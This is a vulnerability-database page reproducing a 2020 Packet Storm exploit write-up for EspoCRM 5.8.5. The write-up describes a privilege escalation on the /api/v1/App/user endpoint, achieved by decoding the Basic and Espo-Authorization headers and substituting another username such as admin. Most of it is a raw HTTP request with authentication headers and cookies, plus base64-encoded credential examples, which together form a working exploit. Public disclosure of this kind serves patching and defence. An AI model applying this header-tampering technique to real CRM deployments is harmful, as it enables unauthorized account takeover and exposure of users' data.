Lucene search
K

EspoCRM 5.8.5 Privilege Escalation

🗓️ 24 Apr 2020 00:00:00Reported by Besim AltinokType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 84 Views

EspoCRM 5.8.5 Privilege Escalation details on /api/v1/App/user endpoint

Code
`# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation  
# Author: Besim ALTINOK  
# Vendor Homepage: https://www.espocrm.com  
# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip  
# Version: v5.8.5  
# Tested on: Xampp  
# Credit: İsmail BOZKURT  
  
-------------  
  
Details:  
--------------------------------------------  
  
1- When we sent a request to the /api/v1/App/user, we can see user details  
---  
First Request:  
---------------------------  
GET /api/v1/App/user HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 *************************  
Authorization: Basic *************************************  
Espo-Authorization: *************************************  
Espo-Authorization-By-Token: true  
X-Requested-With: XMLHttpRequest  
DNT: 1  
Connection: close  
Cookie: auth-token-secret=cdc7f7*********************377;  
auth-username=user1; auth-token=3a874a********************************48  
----  
  
2- When we decode Basic Authorization and Espo-Authorization and change the  
value with another username (like admin) in the first request, we can see  
other user information and access like BOSS  
----------  
  
3- Some Examples and encode technique  
  
- BASE64:  
First type: dXNlcjE6MQ== (user1:1)  
Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Apr 2020 00:00Current
0.5Low risk
Vulners AI Score0.5
84